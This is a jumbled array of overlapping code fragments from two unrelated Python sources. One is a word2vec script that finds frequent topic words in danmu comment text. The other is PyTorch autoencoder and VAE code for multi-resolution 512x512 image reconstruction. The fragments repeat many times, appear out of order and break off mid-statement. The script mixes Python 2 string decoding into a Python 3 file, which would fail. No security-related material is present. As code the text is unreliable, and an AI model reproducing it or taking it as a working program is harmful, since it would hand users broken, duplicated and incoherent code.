re.sub(\"!,❤。~《》:()【】「」?”“;:、\".decode(\"utf8\"),\"\",word) if not re.match(r\"[【】╮╯▽╰╭★→「」\\s+\\.\\!\\/_,$%^*(+\\\"\\']+|[+——!,。?、~@#¥%……&*()!,❤。~《》:()【】「」?”“;:、0-9a-zA-Z]+\", word): try:", "word = re.sub(\"[【】╮╯▽╰╭★→「」]+\".decode(\"utf8\"),\"\",word) # word = re.sub(\"!,❤。~《》:()【】「」?”“;:、\".decode(\"utf8\"),\"\",word) if not re.match(r\"[【】╮╯▽╰╭★→「」\\s+\\.\\!\\/_,$%^*(+\\\"\\']+|[+——!,。?、~@#¥%……&*()!,❤。~《》:()【】「」?”“;:、0-9a-zA-Z]+\", word): try: similarWords", "wordFreq[similarWord[0]] += 1 except: pass top10Words = [k for k in sorted(wordFreq.items(), key=itemgetter(1),", "word = re.sub(\"!,❤。~《》:()【】「」?”“;:、\".decode(\"utf8\"),\"\",word) if not re.match(r\"[【】╮╯▽╰╭★→「」\\s+\\.\\!\\/_,$%^*(+\\\"\\']+|[+——!,。?、~@#¥%……&*()!,❤。~《》:()【】「」?”“;:、0-9a-zA-Z]+\", word): try: similarWords = model.most_similar(word, topn=10) for", "#!/usr/bin/env python3 import re from gensim.models import word2vec from gensim.models import KeyedVectors from", "= re.sub(\"!,❤。~《》:()【】「」?”“;:、\".decode(\"utf8\"),\"\",word) if not re.match(r\"[【】╮╯▽╰╭★→「」\\s+\\.\\!\\/_,$%^*(+\\\"\\']+|[+——!,。?、~@#¥%……&*()!,❤。~《》:()【】「」?”“;:、0-9a-zA-Z]+\", word): try: similarWords = model.most_similar(word, topn=10) for idx,", "except: pass top10Words = [k for k in sorted(wordFreq.items(), key=itemgetter(1), reverse=True)[:10]] for _,", "binary=True) #predict for each word and then calculate the most frequent topic word", "import KeyedVectors from operator import itemgetter filePath = '/home/ubuntu/danmu/corpusSegRecentWords.txt' fileTrainRead = [] #read", "word in enumerate(words): # word = re.sub(\"[\\s+\\.\\!\\/_,$%^*(+\\\"\\']+|[+——!,。?、~@#¥%……&*()]+\".decode(\"utf8\"), \"\",word) # word = re.sub(\"[【】╮╯▽╰╭★→「」]+\".decode(\"utf8\"),\"\",word) #", "= [k for k in sorted(wordFreq.items(), key=itemgetter(1), reverse=True)[:10]] for _, word in enumerate(top10Words):", "re.match(r\"[【】╮╯▽╰╭★→「」\\s+\\.\\!\\/_,$%^*(+\\\"\\']+|[+——!,。?、~@#¥%……&*()!,❤。~《》:()【】「」?”“;:、0-9a-zA-Z]+\", word): try: similarWords = 
model.most_similar(word, topn=10) for idx, similarWord in enumerate(similarWords): if", "pass top10Words = [k for k in sorted(wordFreq.items(), key=itemgetter(1), reverse=True)[:10]] for _, word", "wordFreq: wordFreq[similarWord[0]] = 1 else: wordFreq[similarWord[0]] += 1 except: pass top10Words = [k", "similarWord[0] not in wordFreq: wordFreq[similarWord[0]] = 1 else: wordFreq[similarWord[0]] += 1 except: pass", "pre-trained word2vec vector set model = KeyedVectors.load_word2vec_format('/home/ubuntu/danmu/corpusWord2Vec.bin', binary=True) #predict for each word and", "import re from gensim.models import word2vec from gensim.models import KeyedVectors from operator import", "= [] #read the file by line with open(filePath) as fileTrainRaw: for line", "word): try: similarWords = model.most_similar(word, topn=10) for idx, similarWord in enumerate(similarWords): if similarWord[0]", "file by line with open(filePath) as fileTrainRaw: for line in fileTrainRaw: fileTrainRead.append(line) #load", "= re.sub(\"[\\s+\\.\\!\\/_,$%^*(+\\\"\\']+|[+——!,。?、~@#¥%……&*()]+\".decode(\"utf8\"), \"\",word) # word = re.sub(\"[【】╮╯▽╰╭★→「」]+\".decode(\"utf8\"),\"\",word) # word = re.sub(\"!,❤。~《》:()【】「」?”“;:、\".decode(\"utf8\"),\"\",word) if not", "not in wordFreq: wordFreq[similarWord[0]] = 1 else: wordFreq[similarWord[0]] += 1 except: pass top10Words", "j, word in enumerate(words): # word = re.sub(\"[\\s+\\.\\!\\/_,$%^*(+\\\"\\']+|[+——!,。?、~@#¥%……&*()]+\".decode(\"utf8\"), \"\",word) # word = re.sub(\"[【】╮╯▽╰╭★→「」]+\".decode(\"utf8\"),\"\",word)", "the file by line with open(filePath) as fileTrainRaw: for line in fileTrainRaw: fileTrainRead.append(line)", "wordFreq[similarWord[0]] = 1 else: wordFreq[similarWord[0]] += 1 except: pass top10Words = [k for", "vector set model = KeyedVectors.load_word2vec_format('/home/ubuntu/danmu/corpusWord2Vec.bin', binary=True) #predict for each word and then calculate", "enumerate(similarWords): if similarWord[0] not in wordFreq: wordFreq[similarWord[0]] 
= 1 else: wordFreq[similarWord[0]] += 1", "from gensim.models import KeyedVectors from operator import itemgetter filePath = '/home/ubuntu/danmu/corpusSegRecentWords.txt' fileTrainRead =", "idx, similarWord in enumerate(similarWords): if similarWord[0] not in wordFreq: wordFreq[similarWord[0]] = 1 else:", "fileTrainRaw: for line in fileTrainRaw: fileTrainRead.append(line) #load the pre-trained word2vec vector set model", "if similarWord[0] not in wordFreq: wordFreq[similarWord[0]] = 1 else: wordFreq[similarWord[0]] += 1 except:", "open(filePath) as fileTrainRaw: for line in fileTrainRaw: fileTrainRead.append(line) #load the pre-trained word2vec vector", "line in fileTrainRaw: fileTrainRead.append(line) #load the pre-trained word2vec vector set model = KeyedVectors.load_word2vec_format('/home/ubuntu/danmu/corpusWord2Vec.bin',", "itemgetter filePath = '/home/ubuntu/danmu/corpusSegRecentWords.txt' fileTrainRead = [] #read the file by line with", "\"\",word) # word = re.sub(\"[【】╮╯▽╰╭★→「」]+\".decode(\"utf8\"),\"\",word) # word = re.sub(\"!,❤。~《》:()【】「」?”“;:、\".decode(\"utf8\"),\"\",word) if not re.match(r\"[【】╮╯▽╰╭★→「」\\s+\\.\\!\\/_,$%^*(+\\\"\\']+|[+——!,。?、~@#¥%……&*()!,❤。~《》:()【】「」?”“;:、0-9a-zA-Z]+\", word):", "re.sub(\"[【】╮╯▽╰╭★→「」]+\".decode(\"utf8\"),\"\",word) # word = re.sub(\"!,❤。~《》:()【】「」?”“;:、\".decode(\"utf8\"),\"\",word) if not re.match(r\"[【】╮╯▽╰╭★→「」\\s+\\.\\!\\/_,$%^*(+\\\"\\']+|[+——!,。?、~@#¥%……&*()!,❤。~《》:()【】「」?”“;:、0-9a-zA-Z]+\", word): try: similarWords = model.most_similar(word,", "+= 1 except: pass top10Words = [k for k in sorted(wordFreq.items(), key=itemgetter(1), reverse=True)[:10]]", "fileTrainRaw: fileTrainRead.append(line) #load the pre-trained word2vec vector set model = KeyedVectors.load_word2vec_format('/home/ubuntu/danmu/corpusWord2Vec.bin', binary=True) #predict", "the most frequent topic word set wordFreq = {} for i in range(len(fileTrainRead)):", "in enumerate(words): # word = 
re.sub(\"[\\s+\\.\\!\\/_,$%^*(+\\\"\\']+|[+——!,。?、~@#¥%……&*()]+\".decode(\"utf8\"), \"\",word) # word = re.sub(\"[【】╮╯▽╰╭★→「」]+\".decode(\"utf8\"),\"\",word) # word", "not re.match(r\"[【】╮╯▽╰╭★→「」\\s+\\.\\!\\/_,$%^*(+\\\"\\']+|[+——!,。?、~@#¥%……&*()!,❤。~《》:()【】「」?”“;:、0-9a-zA-Z]+\", word): try: similarWords = model.most_similar(word, topn=10) for idx, similarWord in enumerate(similarWords):", "topn=10) for idx, similarWord in enumerate(similarWords): if similarWord[0] not in wordFreq: wordFreq[similarWord[0]] =", "in enumerate(similarWords): if similarWord[0] not in wordFreq: wordFreq[similarWord[0]] = 1 else: wordFreq[similarWord[0]] +=", "set model = KeyedVectors.load_word2vec_format('/home/ubuntu/danmu/corpusWord2Vec.bin', binary=True) #predict for each word and then calculate the", "filePath = '/home/ubuntu/danmu/corpusSegRecentWords.txt' fileTrainRead = [] #read the file by line with open(filePath)", "for k in sorted(wordFreq.items(), key=itemgetter(1), reverse=True)[:10]] for _, word in enumerate(top10Words): print (word[0])", "range(len(fileTrainRead)): words = fileTrainRead[i][0].split( ) for j, word in enumerate(words): # word =", "#load the pre-trained word2vec vector set model = KeyedVectors.load_word2vec_format('/home/ubuntu/danmu/corpusWord2Vec.bin', binary=True) #predict for each", "{} for i in range(len(fileTrainRead)): words = fileTrainRead[i][0].split( ) for j, word in", "import word2vec from gensim.models import KeyedVectors from operator import itemgetter filePath = '/home/ubuntu/danmu/corpusSegRecentWords.txt'", "frequent topic word set wordFreq = {} for i in range(len(fileTrainRead)): words =", "re.sub(\"!,❤。~《》:()【】「」?”“;:、\".decode(\"utf8\"),\"\",word) if not re.match(r\"[【】╮╯▽╰╭★→「」\\s+\\.\\!\\/_,$%^*(+\\\"\\']+|[+——!,。?、~@#¥%……&*()!,❤。~《》:()【】「」?”“;:、0-9a-zA-Z]+\", word): try: similarWords = model.most_similar(word, topn=10) for idx, similarWord", "python3 import re from gensim.models import word2vec from gensim.models import KeyedVectors 
from operator", "set wordFreq = {} for i in range(len(fileTrainRead)): words = fileTrainRead[i][0].split( ) for", "re.sub(\"[\\s+\\.\\!\\/_,$%^*(+\\\"\\']+|[+——!,。?、~@#¥%……&*()]+\".decode(\"utf8\"), \"\",word) # word = re.sub(\"[【】╮╯▽╰╭★→「」]+\".decode(\"utf8\"),\"\",word) # word = re.sub(\"!,❤。~《》:()【】「」?”“;:、\".decode(\"utf8\"),\"\",word) if not re.match(r\"[【】╮╯▽╰╭★→「」\\s+\\.\\!\\/_,$%^*(+\\\"\\']+|[+——!,。?、~@#¥%……&*()!,❤。~《》:()【】「」?”“;:、0-9a-zA-Z]+\",", "1 else: wordFreq[similarWord[0]] += 1 except: pass top10Words = [k for k in", "gensim.models import KeyedVectors from operator import itemgetter filePath = '/home/ubuntu/danmu/corpusSegRecentWords.txt' fileTrainRead = []", "similarWords = model.most_similar(word, topn=10) for idx, similarWord in enumerate(similarWords): if similarWord[0] not in", "as fileTrainRaw: for line in fileTrainRaw: fileTrainRead.append(line) #load the pre-trained word2vec vector set", "= re.sub(\"[【】╮╯▽╰╭★→「」]+\".decode(\"utf8\"),\"\",word) # word = re.sub(\"!,❤。~《》:()【】「」?”“;:、\".decode(\"utf8\"),\"\",word) if not re.match(r\"[【】╮╯▽╰╭★→「」\\s+\\.\\!\\/_,$%^*(+\\\"\\']+|[+——!,。?、~@#¥%……&*()!,❤。~《》:()【】「」?”“;:、0-9a-zA-Z]+\", word): try: similarWords =", "model.most_similar(word, topn=10) for idx, similarWord in enumerate(similarWords): if similarWord[0] not in wordFreq: wordFreq[similarWord[0]]", "model = KeyedVectors.load_word2vec_format('/home/ubuntu/danmu/corpusWord2Vec.bin', binary=True) #predict for each word and then calculate the most", "= 1 else: wordFreq[similarWord[0]] += 1 except: pass top10Words = [k for k", "for i in range(len(fileTrainRead)): words = fileTrainRead[i][0].split( ) for j, word in enumerate(words):", "[] #read the file by line with open(filePath) as fileTrainRaw: for line in", "with open(filePath) as fileTrainRaw: for line in fileTrainRaw: fileTrainRead.append(line) #load the pre-trained word2vec", "word2vec vector set model = KeyedVectors.load_word2vec_format('/home/ubuntu/danmu/corpusWord2Vec.bin', binary=True) 
#predict for each word and then", "= {} for i in range(len(fileTrainRead)): words = fileTrainRead[i][0].split( ) for j, word", "then calculate the most frequent topic word set wordFreq = {} for i", "gensim.models import word2vec from gensim.models import KeyedVectors from operator import itemgetter filePath =", "line with open(filePath) as fileTrainRaw: for line in fileTrainRaw: fileTrainRead.append(line) #load the pre-trained", "1 except: pass top10Words = [k for k in sorted(wordFreq.items(), key=itemgetter(1), reverse=True)[:10]] for", "else: wordFreq[similarWord[0]] += 1 except: pass top10Words = [k for k in sorted(wordFreq.items(),", "KeyedVectors.load_word2vec_format('/home/ubuntu/danmu/corpusWord2Vec.bin', binary=True) #predict for each word and then calculate the most frequent topic", "enumerate(words): # word = re.sub(\"[\\s+\\.\\!\\/_,$%^*(+\\\"\\']+|[+——!,。?、~@#¥%……&*()]+\".decode(\"utf8\"), \"\",word) # word = re.sub(\"[【】╮╯▽╰╭★→「」]+\".decode(\"utf8\"),\"\",word) # word =", "most frequent topic word set wordFreq = {} for i in range(len(fileTrainRead)): words", "for j, word in enumerate(words): # word = re.sub(\"[\\s+\\.\\!\\/_,$%^*(+\\\"\\']+|[+——!,。?、~@#¥%……&*()]+\".decode(\"utf8\"), \"\",word) # word =", ") for j, word in enumerate(words): # word = re.sub(\"[\\s+\\.\\!\\/_,$%^*(+\\\"\\']+|[+——!,。?、~@#¥%……&*()]+\".decode(\"utf8\"), \"\",word) # word", "# word = re.sub(\"!,❤。~《》:()【】「」?”“;:、\".decode(\"utf8\"),\"\",word) if not re.match(r\"[【】╮╯▽╰╭★→「」\\s+\\.\\!\\/_,$%^*(+\\\"\\']+|[+——!,。?、~@#¥%……&*()!,❤。~《》:()【】「」?”“;:、0-9a-zA-Z]+\", word): try: similarWords = model.most_similar(word, topn=10)", "in range(len(fileTrainRead)): words = fileTrainRead[i][0].split( ) for j, word in enumerate(words): # word", "from operator import itemgetter filePath = '/home/ubuntu/danmu/corpusSegRecentWords.txt' fileTrainRead = [] #read the file", "#read the file by line with open(filePath) as fileTrainRaw: for line in fileTrainRaw:", "by line with open(filePath) as 
fileTrainRaw: for line in fileTrainRaw: fileTrainRead.append(line) #load the", "in wordFreq: wordFreq[similarWord[0]] = 1 else: wordFreq[similarWord[0]] += 1 except: pass top10Words =", "in fileTrainRaw: fileTrainRead.append(line) #load the pre-trained word2vec vector set model = KeyedVectors.load_word2vec_format('/home/ubuntu/danmu/corpusWord2Vec.bin', binary=True)", "each word and then calculate the most frequent topic word set wordFreq =", "re from gensim.models import word2vec from gensim.models import KeyedVectors from operator import itemgetter", "fileTrainRead.append(line) #load the pre-trained word2vec vector set model = KeyedVectors.load_word2vec_format('/home/ubuntu/danmu/corpusWord2Vec.bin', binary=True) #predict for", "word and then calculate the most frequent topic word set wordFreq = {}", "if not re.match(r\"[【】╮╯▽╰╭★→「」\\s+\\.\\!\\/_,$%^*(+\\\"\\']+|[+——!,。?、~@#¥%……&*()!,❤。~《》:()【】「」?”“;:、0-9a-zA-Z]+\", word): try: similarWords = model.most_similar(word, topn=10) for idx, similarWord in", "the pre-trained word2vec vector set model = KeyedVectors.load_word2vec_format('/home/ubuntu/danmu/corpusWord2Vec.bin', binary=True) #predict for each word", "and then calculate the most frequent topic word set wordFreq = {} for", "words = fileTrainRead[i][0].split( ) for j, word in enumerate(words): # word = re.sub(\"[\\s+\\.\\!\\/_,$%^*(+\\\"\\']+|[+——!,。?、~@#¥%……&*()]+\".decode(\"utf8\"),", "= KeyedVectors.load_word2vec_format('/home/ubuntu/danmu/corpusWord2Vec.bin', binary=True) #predict for each word and then calculate the most frequent", "import itemgetter filePath = '/home/ubuntu/danmu/corpusSegRecentWords.txt' fileTrainRead = [] #read the file by line", "word2vec from gensim.models import KeyedVectors from operator import itemgetter filePath = '/home/ubuntu/danmu/corpusSegRecentWords.txt' fileTrainRead", "'/home/ubuntu/danmu/corpusSegRecentWords.txt' fileTrainRead = [] #read the file by line with open(filePath) as fileTrainRaw:", "= 
'/home/ubuntu/danmu/corpusSegRecentWords.txt' fileTrainRead = [] #read the file by line with open(filePath) as", "for each word and then calculate the most frequent topic word set wordFreq", "similarWord in enumerate(similarWords): if similarWord[0] not in wordFreq: wordFreq[similarWord[0]] = 1 else: wordFreq[similarWord[0]]", "wordFreq = {} for i in range(len(fileTrainRead)): words = fileTrainRead[i][0].split( ) for j,", "[k for k in sorted(wordFreq.items(), key=itemgetter(1), reverse=True)[:10]] for _, word in enumerate(top10Words): print", "for idx, similarWord in enumerate(similarWords): if similarWord[0] not in wordFreq: wordFreq[similarWord[0]] = 1", "= fileTrainRead[i][0].split( ) for j, word in enumerate(words): # word = re.sub(\"[\\s+\\.\\!\\/_,$%^*(+\\\"\\']+|[+——!,。?、~@#¥%……&*()]+\".decode(\"utf8\"), \"\",word)", "= model.most_similar(word, topn=10) for idx, similarWord in enumerate(similarWords): if similarWord[0] not in wordFreq:" ]
[ "state size. (nef*16) x 16 x 16 nn.Conv2d(nef * 16, nef * 32,", "* 2, ngf, 4, 2, 1, bias=False), nn.BatchNorm2d(ngf), nn.ReLU(True), nn.ConvTranspose2d(ngf, nc, 3, 1,", "import torch.nn as nn from torch.autograd import Variable from Param import nc, nz,", "32 nn.Conv2d(nef*8, nef * 16, 4, 2, 1, bias=False), nn.BatchNorm2d(nef * 16), nn.LeakyReLU(0.2,", "* 4), nn.ReLU(True)) # state size. (ngf*4) x 64 x 64 self.conv_layer128 =", "nn.ConvTranspose2d(ngf * 64, ngf * 32, 4, 2, 1, bias=False), nn.BatchNorm2d(ngf * 32),", "nn.ReLU(True), # size ngf*64 x4 x4 nn.ConvTranspose2d(ngf * 64, ngf * 32, 4,", "nz, device class Model512(nn.Module): def __init__(self,nz=nz,nef=8,ngf=8,nc=nc): super(Model512, self).__init__() self.nz=nz self.nc=nc ## Encoder Part", "16, nef * 32, 4, 2, 1, bias=False), nn.BatchNorm2d(nef * 32), nn.LeakyReLU(0.2, inplace=True),", "self.output_layer = nn.Tanh() #nn.Sigmoid() def forward(self, input): x = self.encode(input) x = self.decode3(x)", "4 nn.Conv2d(nef * 64, nef * 128, 4, 1, 0, bias=False), nn.BatchNorm2d(nef *", "0, bias=False), nn.BatchNorm2d(nef * 128), nn.LeakyReLU(0.2, inplace=True), nn.Conv2d(nef * 128, nz, 1, 1,", "1, bias=False), nn.Tanh() #nn.Sigmoid() # for VAE # state size. (nc) x 512", "VAE_Model512(nn.Module): def __init__(self,nz=nz,ngf=8,nef=8,nc=3): super(VAE_Model512, self).__init__() self.nz=nz self.nc=nc ## Encoder Part ## self.encode =", "state size is (nef) x 256 x 256 nn.Conv2d(nef, nef * 2, 4,", "2, ngf, 4, 2, 1, bias=False), nn.BatchNorm2d(ngf), nn.ReLU(True), nn.ConvTranspose2d(ngf, nc, 3, 1, 1,", "# state size. 
(ngf) x 256 x 256 nn.ConvTranspose2d(ngf, nc, 4, 2, 1,", "= nn.Linear(nz, 64) self.fc3 = nn.Linear(64, nz) def reparametrize(self, mu, logvar): std =", "x 64 x 64 self.conv_layer128 = nn.Sequential( nn.ConvTranspose2d(ngf * 4, ngf * 2,", "def forward(self, input): b_size = input.shape[0] x = self.encode(input).view(b_size, nz) mu = self.fc1(x)", "## self.decode3 = nn.Sequential( nn.ConvTranspose2d(nz, ngf *128 , 2, 1, 0, bias=False), nn.BatchNorm2d(ngf", "self.nz=nz self.nc=nc ## Encoder Part ## self.encode = nn.Sequential( # input is (nc)", "bias=False), nn.BatchNorm2d(ngf * 8), nn.ReLU(True), # state size. (ngf*8) x 32 x 32", "out256 = self.output_layer(self.conv_layer256(x)) out512 = self.decode1(x) return out128, out256, out512 \"\"\" VAE with", "x = self.encode(input) x = self.decode3(x) out128 = self.output_layer(self.conv_layer128(x)) x = self.decode2(x) out256", "2, 1, bias=False), nn.BatchNorm2d(ngf * 4), nn.ReLU(True)) # state size. (ngf*4) x 64", "1, bias=False), nn.ConvTranspose2d(ngf, nc, 3, 1, 1, bias=False)) self.decode2 = nn.Sequential( nn.ConvTranspose2d(ngf *", "x 128 self.conv_layer256 = nn.Sequential( nn.ConvTranspose2d(ngf * 2, ngf, 4, 2, 1, bias=False),", "* 4, ngf * 2, 4, 2, 1, bias=False), nn.BatchNorm2d(ngf * 2), nn.ReLU(True),", "2, 4, 2, 1, bias=False), nn.BatchNorm2d(ngf * 2), nn.ReLU(True)) # state size. 
(ngf*2)", "out128 = self.output_layer(self.conv_layer128(x)) x = self.decode2(x) out256 = self.output_layer(self.conv_layer256(x)) out512 = self.decode1(x) return", "nn.Sequential( nn.ConvTranspose2d(ngf * 2, ngf, 4, 2, 1, bias=False), nn.BatchNorm2d(ngf), nn.ReLU(True), # state", "nef * 4, 4, 2, 1, bias=False), nn.BatchNorm2d(nef * 4), nn.LeakyReLU(0.2, inplace=True), #", "nn.Sigmoid() ) ## ##### ## Decoder Part ## self.decode3 = nn.Sequential( nn.ConvTranspose2d(nz, ngf", "nn.Linear(64, nz) def reparametrize(self, mu, logvar): std = logvar.mul(0.5).exp_() eps = torch.FloatTensor(std.size()).normal_().to(device) eps", "# size ngf*128 x2 x2 nn.ConvTranspose2d(ngf * 128, ngf * 64, 4, 2,", "state size. (ngf*16) x 16 x16 nn.ConvTranspose2d(ngf * 16, ngf * 8, 4,", "nn.ConvTranspose2d(ngf, nc, 4, 2, 1, bias=False), nn.Tanh() #nn.Sigmoid() # for VAE # state", "x 64 nn.Conv2d(nef * 4, nef * 8, 4, 2, 1, bias=False), nn.BatchNorm2d(nef", "= Variable(eps) return eps.mul(std).add_(mu) def forward(self, input): b_size = input.shape[0] x = self.encode(input).view(b_size,", "size. (ngf) x 256 x 256 nn.ConvTranspose2d(ngf, nc, 4, 2, 1, bias=False), nn.Tanh()", "32, nef * 64, 4, 2, 1, bias=False), nn.BatchNorm2d(nef * 64), nn.LeakyReLU(0.2, inplace=True),", "x16 nn.ConvTranspose2d(ngf * 16, ngf * 8, 4, 2, 1, bias=False), nn.BatchNorm2d(ngf *", "(ngf*8) x 32 x 32 nn.ConvTranspose2d(ngf * 8, ngf * 4, 4, 2,", "self.decode1 = nn.Sequential( nn.ConvTranspose2d(ngf * 2, ngf, 4, 2, 1, bias=False), nn.BatchNorm2d(ngf), nn.ReLU(True),", "nn.BatchNorm2d(ngf * 16), nn.ReLU(True), # state size. 
(ngf*16) x 16 x16 nn.ConvTranspose2d(ngf *", "bias=False), nn.BatchNorm2d(ngf * 128), nn.ReLU(True), # size ngf*128 x2 x2 nn.ConvTranspose2d(ngf * 128,", "32, 4, 2, 1, bias=False), nn.BatchNorm2d(ngf * 32), nn.ReLU(True), # size ngf*32 x8", "self.decode2(x) out256 = self.output_layer(self.conv_layer256(x)) out512 = self.decode1(x) return out128, out256, out512 \"\"\" VAE", "* 128), nn.ReLU(True), # size ngf*128 x2 x2 nn.ConvTranspose2d(ngf * 128, ngf *", "x = self.decode3(x) out128 = self.output_layer(self.conv_layer128(x)) x = self.decode2(x) out256 = self.output_layer(self.conv_layer256(x)) out512", "128 nn.Conv2d(nef*2, nef * 4, 4, 2, 1, bias=False), nn.BatchNorm2d(nef * 4), nn.LeakyReLU(0.2,", "# state size. (nef*16) x 16 x 16 nn.Conv2d(nef * 16, nef *", "64, nef * 128, 4, 1, 0, bias=False), nn.BatchNorm2d(nef * 128), nn.LeakyReLU(0.2, inplace=True),", "x8 x8 nn.ConvTranspose2d(ngf*32, ngf * 16, 4, 2, 1, bias=False), nn.BatchNorm2d(ngf * 16),", "16), nn.ReLU(True), # state size. (ngf*16) x 16 x16 nn.ConvTranspose2d(ngf * 16, ngf", "torch.FloatTensor(std.size()).normal_().to(device) eps = Variable(eps) return eps.mul(std).add_(mu) def forward(self, input): b_size = input.shape[0] x", "nn.LeakyReLU(0.2, inplace=True), # state size. (nef*64) x 4 x 4 nn.Conv2d(nef * 64,", "# for VAE # state size. (nc) x 512 x 512 ) self.output_layer", "2, 1, bias=False), nn.BatchNorm2d(nef * 4), nn.LeakyReLU(0.2, inplace=True), # state size. (nef*4) x", "x4 nn.ConvTranspose2d(ngf * 64, ngf * 32, 4, 2, 1, bias=False), nn.BatchNorm2d(ngf *", "self.nz, 1, 1) #fc3 #del x x = self.decode3(z) out128 = self.output_layer(self.conv_layer128(x)) x", "state size. (nef*32) x 8 x 8 nn.Conv2d(nef * 32, nef * 64,", "512 x 512 ) self.output_layer = nn.Tanh() #nn.Sigmoid() self.fc1 = nn.Linear(nz, 64) self.fc2", "state size. (nc) x 512 x 512 ) self.output_layer = nn.Tanh() #nn.Sigmoid() def", "# state size. 
(ngf*2) x 128 x 128 self.conv_layer256 = nn.Sequential( nn.ConvTranspose2d(ngf *", "x 512 x 512 nn.Conv2d(nc, nef, 4, 2, 1, bias=False), nn.BatchNorm2d(nef), nn.LeakyReLU(0.2, inplace=True),", "* 16, nef * 32, 4, 2, 1, bias=False), nn.BatchNorm2d(nef * 32), nn.LeakyReLU(0.2,", "(nef*2) x 128 x 128 nn.Conv2d(nef*2, nef * 4, 4, 2, 1, bias=False),", "import nc, nz, device class Model512(nn.Module): def __init__(self,nz=nz,nef=8,ngf=8,nc=nc): super(Model512, self).__init__() self.nz=nz self.nc=nc ##", "z = self.reparametrize(mu, logvar) z = self.fc3(z).reshape(-1, self.nz, 1, 1) #fc3 #del x", "\"\"\" class VAE_Model512(nn.Module): def __init__(self,nz=nz,ngf=8,nef=8,nc=3): super(VAE_Model512, self).__init__() self.nz=nz self.nc=nc ## Encoder Part ##", "2), nn.ReLU(True), nn.ConvTranspose2d(ngf * 2, ngf, 3, 1, 1, bias=False), nn.ConvTranspose2d(ngf, nc, 3,", "1, 0, bias=False), nn.BatchNorm2d(ngf * 128), nn.ReLU(True), # size ngf*128 x2 x2 nn.ConvTranspose2d(ngf", "inplace=True), # state size. (nef*2) x 128 x 128 nn.Conv2d(nef*2, nef * 4,", "8 nn.Conv2d(nef * 32, nef * 64, 4, 2, 1, bias=False), nn.BatchNorm2d(nef *", "nn.ConvTranspose2d(ngf*32, ngf * 16, 4, 2, 1, bias=False), nn.BatchNorm2d(ngf * 16), nn.ReLU(True), #", "4), nn.ReLU(True)) # state size. (ngf*4) x 64 x 64 self.conv_layer128 = nn.Sequential(", "nn.ReLU(True)) # state size. 
import torch
import torch.nn as nn
from torch.autograd import Variable  # kept for backward compatibility; no longer used below
from Param import nc, nz, device


def _encoder(nc, nef, nz):
    """Encoder: (nc, 512, 512) image -> (nz, 1, 1) latent code in [0, 1] (final Sigmoid)."""
    return nn.Sequential(
        # input is (nc) x 512 x 512
        nn.Conv2d(nc, nef, 4, 2, 1, bias=False),
        nn.BatchNorm2d(nef),
        nn.LeakyReLU(0.2, inplace=True),
        # state size (nef) x 256 x 256
        nn.Conv2d(nef, nef * 2, 4, 2, 1, bias=False),
        nn.BatchNorm2d(nef * 2),
        nn.LeakyReLU(0.2, inplace=True),
        # state size (nef*2) x 128 x 128
        nn.Conv2d(nef * 2, nef * 4, 4, 2, 1, bias=False),
        nn.BatchNorm2d(nef * 4),
        nn.LeakyReLU(0.2, inplace=True),
        # state size (nef*4) x 64 x 64
        nn.Conv2d(nef * 4, nef * 8, 4, 2, 1, bias=False),
        nn.BatchNorm2d(nef * 8),
        nn.LeakyReLU(0.2, inplace=True),
        # state size (nef*8) x 32 x 32
        nn.Conv2d(nef * 8, nef * 16, 4, 2, 1, bias=False),
        nn.BatchNorm2d(nef * 16),
        nn.LeakyReLU(0.2, inplace=True),
        # state size (nef*16) x 16 x 16
        nn.Conv2d(nef * 16, nef * 32, 4, 2, 1, bias=False),
        nn.BatchNorm2d(nef * 32),
        nn.LeakyReLU(0.2, inplace=True),
        # state size (nef*32) x 8 x 8
        nn.Conv2d(nef * 32, nef * 64, 4, 2, 1, bias=False),
        nn.BatchNorm2d(nef * 64),
        nn.LeakyReLU(0.2, inplace=True),
        # state size (nef*64) x 4 x 4
        nn.Conv2d(nef * 64, nef * 128, 4, 1, 0, bias=False),
        nn.BatchNorm2d(nef * 128),
        nn.LeakyReLU(0.2, inplace=True),
        # state size (nef*128) x 1 x 1 -> project to latent code
        nn.Conv2d(nef * 128, nz, 1, 1, 0, bias=True),
        nn.Sigmoid(),
    )


def _decoder(ngf, nz, nc):
    """Decoder pieces shared by both models.

    Returns ``(decode3, conv_layer128, decode2, conv_layer256, decode1)``:
    - ``decode3``: (nz,1,1) -> (ngf*4, 64, 64) trunk
    - ``conv_layer128``: trunk -> (nc, 128, 128) head (no activation; caller applies it)
    - ``decode2``: trunk -> (ngf*2, 128, 128)
    - ``conv_layer256``: decode2 -> (nc, 256, 256) head (no activation; caller applies it)
    - ``decode1``: decode2 -> (nc, 512, 512), Tanh applied internally
    """
    decode3 = nn.Sequential(
        nn.ConvTranspose2d(nz, ngf * 128, 2, 1, 0, bias=False),
        nn.BatchNorm2d(ngf * 128),
        nn.ReLU(True),
        # size (ngf*128) x 2 x 2
        nn.ConvTranspose2d(ngf * 128, ngf * 64, 4, 2, 1, bias=False),
        nn.BatchNorm2d(ngf * 64),
        nn.ReLU(True),
        # size (ngf*64) x 4 x 4
        nn.ConvTranspose2d(ngf * 64, ngf * 32, 4, 2, 1, bias=False),
        nn.BatchNorm2d(ngf * 32),
        nn.ReLU(True),
        # size (ngf*32) x 8 x 8
        nn.ConvTranspose2d(ngf * 32, ngf * 16, 4, 2, 1, bias=False),
        nn.BatchNorm2d(ngf * 16),
        nn.ReLU(True),
        # state size (ngf*16) x 16 x 16
        nn.ConvTranspose2d(ngf * 16, ngf * 8, 4, 2, 1, bias=False),
        nn.BatchNorm2d(ngf * 8),
        nn.ReLU(True),
        # state size (ngf*8) x 32 x 32
        nn.ConvTranspose2d(ngf * 8, ngf * 4, 4, 2, 1, bias=False),
        nn.BatchNorm2d(ngf * 4),
        nn.ReLU(True),
    )
    # state size (ngf*4) x 64 x 64
    conv_layer128 = nn.Sequential(
        nn.ConvTranspose2d(ngf * 4, ngf * 2, 4, 2, 1, bias=False),
        nn.BatchNorm2d(ngf * 2),
        nn.ReLU(True),
        nn.ConvTranspose2d(ngf * 2, ngf, 3, 1, 1, bias=False),
        nn.ConvTranspose2d(ngf, nc, 3, 1, 1, bias=False),
    )
    decode2 = nn.Sequential(
        nn.ConvTranspose2d(ngf * 4, ngf * 2, 4, 2, 1, bias=False),
        nn.BatchNorm2d(ngf * 2),
        nn.ReLU(True),
    )
    # state size (ngf*2) x 128 x 128
    conv_layer256 = nn.Sequential(
        nn.ConvTranspose2d(ngf * 2, ngf, 4, 2, 1, bias=False),
        nn.BatchNorm2d(ngf),
        nn.ReLU(True),
        nn.ConvTranspose2d(ngf, nc, 3, 1, 1, bias=False),
    )
    decode1 = nn.Sequential(
